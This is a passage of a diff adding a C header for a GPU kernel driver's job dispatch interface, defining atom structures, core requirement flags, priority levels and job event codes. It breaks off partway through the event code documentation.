+/*
+ * Private flags used on the base context
+ *
+ * These start at bit 31, and run down to zero.
+ *
+ * They share the same space as base_context_create_flags, and so must
+ * not collide with them.
+ */
+
+/* Private flag tracking whether job descriptor dumping is disabled */
+#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \
+ ((base_context_create_flags)(1 << 31))
+
+/* Enable additional tracepoints for latency measurements (TL_ATOM_READY,
+ * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST)
+ */
+#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0)
+
+/* Indicate that job dumping is enabled. This could affect certain timers
+ * to account for the performance impact.
+ */
+#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1)
+
+#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
+ BASE_TLSTREAM_JOB_DUMPING_ENABLED)
+/*
+ * Dependency stuff, keep it private for now. May want to expose it if
+ * we decide to make the number of semaphores a configurable
+ * option.
+ */
+#define BASE_JD_ATOM_COUNT 256
+
+/* Maximum number of concurrent render passes.
+ */
+#define BASE_JD_RP_COUNT (256)
+
+/* Set/reset values for a software event */
+#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1)
+#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0)
+
+/**
+ * struct base_jd_udata - Per-job data
+ *
+ * This structure is used to store per-job data, and is completely unused
+ * by the Base driver. It can be used to store things such as callback
+ * function pointer, data to handle job completion. It is guaranteed to be
+ * untouched by the Base driver.
+ *
+ * @blob: per-job data array
+ */
+struct base_jd_udata {
+ __u64 blob[2];
+};
+
+/**
+ * typedef base_jd_dep_type - Job dependency type.
+ *
+ * A flags field will be inserted into the atom structure to specify whether a
+ * dependency is a data or ordering dependency (by putting it before/after
+ * 'core_req' in the structure it should be possible to add without changing
+ * the structure size).
+ * When the flag is set for a particular dependency to signal that it is an
+ * ordering only dependency then errors will not be propagated.
+ */
+typedef __u8 base_jd_dep_type;
+
+#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */
+#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */
+#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */
+
+/**
+ * typedef base_jd_core_req - Job chain hardware requirements.
+ *
+ * A job chain must specify what GPU features it needs to allow the
+ * driver to schedule the job correctly. By not specifying the
+ * correct settings can/will cause an early job termination. Multiple
+ * values can be ORed together to specify multiple requirements.
+ * Special case is ::BASE_JD_REQ_DEP, which is used to express complex
+ * dependencies, and that doesn't execute anything on the hardware.
+ */
+typedef __u32 base_jd_core_req;
+
+/* Requirements that come from the HW */
+
+/* No requirement, dependency only
+ */
+#define BASE_JD_REQ_DEP ((base_jd_core_req)0)
+
+/* Requires fragment shaders
+ */
+#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0)
+
+/* Requires compute shaders
+ *
+ * This covers any of the following GPU job types:
+ * - Vertex Shader Job
+ * - Geometry Shader Job
+ * - An actual Compute Shader Job
+ *
+ * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the
+ * job is specifically just the "Compute Shader" job type, and not the "Vertex
+ * Shader" nor the "Geometry Shader" job type.
+ */
+#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1)
+
+/* Requires tiling */
+#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2)
+
+/* Requires cache flushes */
+#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3)
+
+/* Requires value writeback */
+#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4)
+
+/* SW-only requirements - the HW does not expose these as part of the job slot
+ * capabilities
+ */
+
+/* Requires fragment job with AFBC encoding */
+#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13)
+
+/* SW-only requirement: coalesce completion events.
+ * If this bit is set then completion of this atom will not cause an event to
+ * be sent to userspace, whether successful or not; completion events will be
+ * deferred until an atom completes which does not have this bit set.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES.
+ */
+#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5)
+
+/* SW Only requirement: the job chain requires a coherent core group. We don't
+ * mind which coherent core group is used.
+ */
+#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6)
+
+/* SW Only requirement: The performance counters should be enabled only when
+ * they are needed, to reduce power consumption.
+ */
+#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7)
+
+/* SW Only requirement: External resources are referenced by this atom.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and
+ * BASE_JD_REQ_SOFT_EVENT_WAIT.
+ */
+#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8)
+
+/* SW Only requirement: Software defined job. Jobs with this bit set will not be
+ * submitted to the hardware but will cause some action to happen within the
+ * driver
+ */
+#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9)
+
+#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1)
+#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2)
+#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3)
+
+/* 0x4 RESERVED for now */
+
+/* SW only requirement: event wait/trigger job.
+ *
+ * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set.
+ * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the
+ * other waiting jobs. It completes immediately.
+ * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it
+ * possible for other jobs to wait upon. It completes immediately.
+ */
+#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5)
+#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6)
+#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7)
+
+#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8)
+
+/* SW only requirement: Just In Time allocation
+ *
+ * This job requests a single or multiple just-in-time allocations through a
+ * list of base_jit_alloc_info structure which is passed via the jc element of
+ * the atom. The number of base_jit_alloc_info structures present in the
+ * list is passed via the nr_extres element of the atom
+ *
+ * It should be noted that the id entry in base_jit_alloc_info must not
+ * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE.
+ *
+ * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE
+ * soft job to free the JIT allocation is still made.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9)
+
+/* SW only requirement: Just In Time free
+ *
+ * This job requests a single or multiple just-in-time allocations created by
+ * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time
+ * allocations is passed via the jc element of the atom.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa)
+
+/* SW only requirement: Map external resource
+ *
+ * This job requests external resource(s) are mapped once the dependencies
+ * of the job have been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb)
+
+/* SW only requirement: Unmap external resource
+ *
+ * This job requests external resource(s) are unmapped once the dependencies
+ * of the job has been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc)
+
+/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders)
+ *
+ * This indicates that the Job Chain contains GPU jobs of the 'Compute
+ * Shaders' type.
+ *
+ * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job
+ * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs.
+ */
+#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10)
+
+/* HW Requirement: Use the base_jd_atom::device_nr field to specify a
+ * particular core group
+ *
+ * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag
+ * takes priority
+ *
+ * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms.
+ *
+ * If the core availability policy is keeping the required core group turned
+ * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code.
+ */
+#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11)
+
+/* SW Flag: If this bit is set then the successful completion of this atom
+ * will not cause an event to be sent to userspace
+ */
+#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12)
+
+/* SW Flag: If this bit is set then completion of this atom will not cause an
+ * event to be sent to userspace, whether successful or not.
+ */
+#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14)
+
+/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job starts which does not have this bit set or a job completes
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use
+ * if the CPU may have written to memory addressed by the job since the last job
+ * without this bit set was submitted.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15)
+
+/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job completes which does not have this bit set or a job starts
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use
+ * if the CPU may read from or partially overwrite memory addressed by the job
+ * before the next job without this bit set completes.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16)
+
+/* Request the atom be executed on a specific job slot.
+ *
+ * When this flag is specified, it takes precedence over any existing job slot
+ * selection logic.
+ */
+#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17)
+
+/* SW-only requirement: The atom is the start of a renderpass.
+ *
+ * If this bit is set then the job chain will be soft-stopped if it causes the
+ * GPU to write beyond the end of the physical pages backing the tiler heap, and
+ * committing more memory to the heap would exceed an internal threshold. It may
+ * be resumed after running one of the job chains attached to an atom with
+ * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be
+ * resumed multiple times until it completes without memory usage exceeding the
+ * threshold.
+ *
+ * Usually used with BASE_JD_REQ_T.
+ */
+#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18)
+
+/* SW-only requirement: The atom is the end of a renderpass.
+ *
+ * If this bit is set then the atom incorporates the CPU address of a
+ * base_jd_fragment object instead of the GPU address of a job chain.
+ *
+ * Which job chain is run depends upon whether the atom with the same renderpass
+ * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or
+ * was soft-stopped when it exceeded an upper threshold for tiler heap memory
+ * usage.
+ *
+ * It also depends upon whether one of the job chains attached to the atom has
+ * already been run as part of the same renderpass (in which case it would have
+ * written unresolved multisampled and otherwise-discarded output to temporary
+ * buffers that need to be read back). The job chain for doing a forced read and
+ * forced write (from/to temporary buffers) is run as many times as necessary.
+ *
+ * Usually used with BASE_JD_REQ_FS.
+ */
+#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19)
+
+/* SW-only requirement: The atom needs to run on a limited core mask affinity.
+ *
+ * If this bit is set then the kbase_context.limited_core_mask will be applied
+ * to the affinity.
+ */
+#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20)
+
+/* These requirement bits are currently unused in base_jd_core_req
+ */
+#define BASEP_JD_REQ_RESERVED \
+ (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \
+ BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \
+ BASE_JD_REQ_EVENT_COALESCE | \
+ BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \
+ BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \
+ BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \
+ BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \
+ BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK))
+
+/* Mask of all bits in base_jd_core_req that control the type of the atom.
+ *
+ * This allows dependency only atoms to have flags set
+ */
+#define BASE_JD_REQ_ATOM_TYPE \
+ (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \
+ BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE)
+
+/**
+ * Mask of all bits in base_jd_core_req that control the type of a soft job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f)
+
+/* Returns non-zero value if core requirements passed define a soft job or
+ * a dependency only job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \
+ (((core_req) & BASE_JD_REQ_SOFT_JOB) || \
+ ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP)
+
+/**
+ * enum kbase_jd_atom_state
+ *
+ * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used.
+ * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD.
+ * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running).
+ * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet
+ * handed back to job dispatcher for
+ * dependency resolution.
+ * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed
+ * back to userspace.
+ */
+enum kbase_jd_atom_state {
+ KBASE_JD_ATOM_STATE_UNUSED,
+ KBASE_JD_ATOM_STATE_QUEUED,
+ KBASE_JD_ATOM_STATE_IN_JS,
+ KBASE_JD_ATOM_STATE_HW_COMPLETED,
+ KBASE_JD_ATOM_STATE_COMPLETED
+};
+
+/**
+ * typedef base_atom_id - Type big enough to store an atom number in.
+ */
+typedef __u8 base_atom_id;
+
+/**
+ * struct base_dependency -
+ *
+ * @atom_id: An atom number
+ * @dependency_type: Dependency type
+ */
+struct base_dependency {
+ base_atom_id atom_id;
+ base_jd_dep_type dependency_type;
+};
+
+/**
+ * struct base_jd_fragment - Set of GPU fragment job chains used for rendering.
+ *
+ * @norm_read_norm_write: Job chain for full rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not exceed
+ * its memory usage threshold and no fragment job chain
+ * was previously run for the same renderpass.
+ * It is used no more than once per renderpass.
+ * @norm_read_forced_write: Job chain for starting incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain exceeded
+ * its memory usage threshold for the first time and
+ * no fragment job chain was previously run for the
+ * same renderpass.
+ * Writes unresolved multisampled and normally-
+ * discarded output to temporary buffers that must be
+ * read back by a subsequent forced_read job chain
+ * before the renderpass is complete.
+ * It is used no more than once per renderpass.
+ * @forced_read_forced_write: Job chain for continuing incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain
+ * exceeded its memory usage threshold again
+ * and a fragment job chain was previously run for
+ * the same renderpass.
+ * Reads unresolved multisampled and
+ * normally-discarded output from temporary buffers
+ * written by a previous forced_write job chain and
+ * writes the same to temporary buffers again.
+ * It is used as many times as required until
+ * rendering completes.
+ * @forced_read_norm_write: Job chain for ending incremental rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not
+ * exceed its memory usage threshold this time and a
+ * fragment job chain was previously run for the same
+ * renderpass.
+ * Reads unresolved multisampled and normally-discarded
+ * output from temporary buffers written by a previous
+ * forced_write job chain in order to complete a
+ * renderpass.
+ * It is used no more than once per renderpass.
+ *
+ * This structure is referenced by the main atom structure if
+ * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req.
+ */
+struct base_jd_fragment {
+ __u64 norm_read_norm_write;
+ __u64 norm_read_forced_write;
+ __u64 forced_read_forced_write;
+ __u64 forced_read_norm_write;
+};
+
+/**
+ * typedef base_jd_prio - Base Atom priority.
+ *
+ * Only certain priority levels are actually implemented, as specified by the
+ * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority
+ * level that is not one of those defined below.
+ *
+ * Priority levels only affect scheduling after the atoms have had dependencies
+ * resolved. For example, a low priority atom that has had its dependencies
+ * resolved might run before a higher priority atom that has not had its
+ * dependencies resolved.
+ *
+ * In general, fragment atoms do not affect non-fragment atoms with
+ * lower priorities, and vice versa. One exception is that there is only one
+ * priority value for each context. So a high-priority (e.g.) fragment atom
+ * could increase its context priority, causing its non-fragment atoms to also
+ * be scheduled sooner.
+ *
+ * The atoms are scheduled as follows with respect to their priorities:
+ * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies
+ * resolved, and atom 'X' has a higher priority than atom 'Y'
+ * * If atom 'Y' is currently running on the HW, then it is interrupted to
+ * allow atom 'X' to run soon after
+ * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing
+ * the next atom to run, atom 'X' will always be chosen instead of atom 'Y'
+ * * Any two atoms that have the same priority could run in any order with
+ * respect to each other. That is, there is no ordering constraint between
+ * atoms of the same priority.
+ *
+ * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are
+ * scheduled between contexts. The default value, 0, will cause higher-priority
+ * atoms to be scheduled first, regardless of their context. The value 1 will
+ * use a round-robin algorithm when deciding which context's atoms to schedule
+ * next, so higher-priority atoms can only preempt lower priority atoms within
+ * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and
+ * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details.
+ */
+typedef __u8 base_jd_prio;
+
+/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */
+#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0)
+/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and
+ * BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_HIGH ((base_jd_prio)1)
+/* Low atom priority. */
+#define BASE_JD_PRIO_LOW ((base_jd_prio)2)
+/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH,
+ * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3)
+
+/* Count of the number of priority levels. This itself is not a valid
+ * base_jd_prio setting
+ */
+#define BASE_JD_NR_PRIO_LEVELS 4
+
+/**
+ * struct base_jd_atom_v2 - Node of a dependency graph used to submit a
+ * GPU job chain or soft-job to the kernel driver.
+ *
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep: Pre-dependencies. One need to use SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ *
+ * This structure has changed since UK 10.2 for which base_jd_core_req was a
+ * __u16 value.
+ *
+ * In UK 10.3 a core_req field of a __u32 type was added to the end of the
+ * structure, and the place in the structure previously occupied by __u16
+ * core_req was kept but renamed to compat_core_req.
+ *
+ * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2].
+ * Compatibility with UK 10.x from UK 11.y is not handled because
+ * the major version increase prevents this.
+ *
+ * For UK 11.20 jit_id[2] must be initialized to zero.
+ */
+struct base_jd_atom_v2 {
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+};
+
+/**
+ * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr
+ * at the beginning.
+ *
+ * @seq_nr: Sequence number of logical grouping of atoms.
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep: Pre-dependencies. One need to use SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ */
+typedef struct base_jd_atom {
+ __u64 seq_nr;
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+} base_jd_atom;
+
+struct base_jit_alloc_info {
+ __u64 gpu_alloc_addr;
+ __u64 va_pages;
+ __u64 commit_pages;
+ __u64 extension;
+ __u8 id;
+ __u8 bin_id;
+ __u8 max_allocations;
+ __u8 flags;
+ __u8 padding[2];
+ __u16 usage_id;
+ __u64 heap_info_gpu_addr;
+};
+
+/* Job chain event code bits
+ * Defines the bits used to create ::base_jd_event_code
+ */
+enum {
+ BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */
+ BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */
+ /* Event indicates success (SW events only) */
+ BASE_JD_SW_EVENT_SUCCESS = (1u << 13),
+ BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */
+ BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */
+ BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */
+ BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */
+ /* Mask to extract the type from an event code */
+ BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11)
+};
+
+/**
+ * enum base_jd_event_code - Job chain event codes
+ *
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status
+ * codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault, because the
+ * job was hard-stopped.
+ * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as
+ * 'previous job done'.
+ * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes
+ * TERMINATED, DONE or JOB_CANCELLED.
+ * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job
+ * was hard stopped.
+ * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on
+ * complete/fail/cancel.
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault,
+ * because the job was hard-stopped.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status
+ * codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes.
+ * Such codes are never returned to
+ * user-space.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes.
+ * @BASE_JD_EVENT_DONE: atom has completed successfull
+ * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which
+ * shall result in a failed atom
+ * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the
+ * part of the memory system required to access
+ * job descriptors was not powered on
+ * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the
+ * specified affinity mask does not intersect
+ * any available cores
+ * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job
+ * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program
+ * counter was executed.
+ * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal
+ * encoding was executed.
+ * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where
+ * the instruction encoding did not match the
+ * instruction type encoded in the program
+ * counter.
+ * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that
+ * contained invalid combinations of operands.
+ * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried
+ * to access the thread local storage section
+ * of another thread.
+ * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that
+ * tried to do an unsupported unaligned memory
+ * access.
+ * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that
+ * failed to complete an instruction barrier.
+ * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job
+ * contains invalid combinations of data.
+ * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to
+ * process a tile that is entirely outside the
+ * bounding box of the frame.
+ * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address
+ * has been found that exceeds the virtual
+ * address range.
+ * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job.
+ * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only
+ * the first one the reports an error will set
+ * and return full error information.
+ * Subsequent failing jobs will not update the
+ * error status registers, and may write an
+ * error status of UNKNOWN.
+ * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to
+ * physical memory where the original virtual
+ * address is no longer available.
+ * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache
+ * has detected that the same line has been
+ * accessed as both shareable and non-shareable
+ * memory from inside the GPU.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table
+ * entry at level 1 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table
+ * entry at level 2 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table
+ * entry at level 3 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table
+ * entry at level 4 of the translation table.
+ * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to
+ * the permission flags set in translation
+ * table
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading
+ * level 0 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading
+ * level 1 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading
+ * level 2 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading
+ * level 3 of the translation tables.
+ * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a
+ * translation table entry with the ACCESS_FLAG
+ * bit set to zero in level 0 of the
+ * page table, and the DISABLE_AF_FAULT flag
+ * was not set.
+ * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to
+ * grow memory on demand
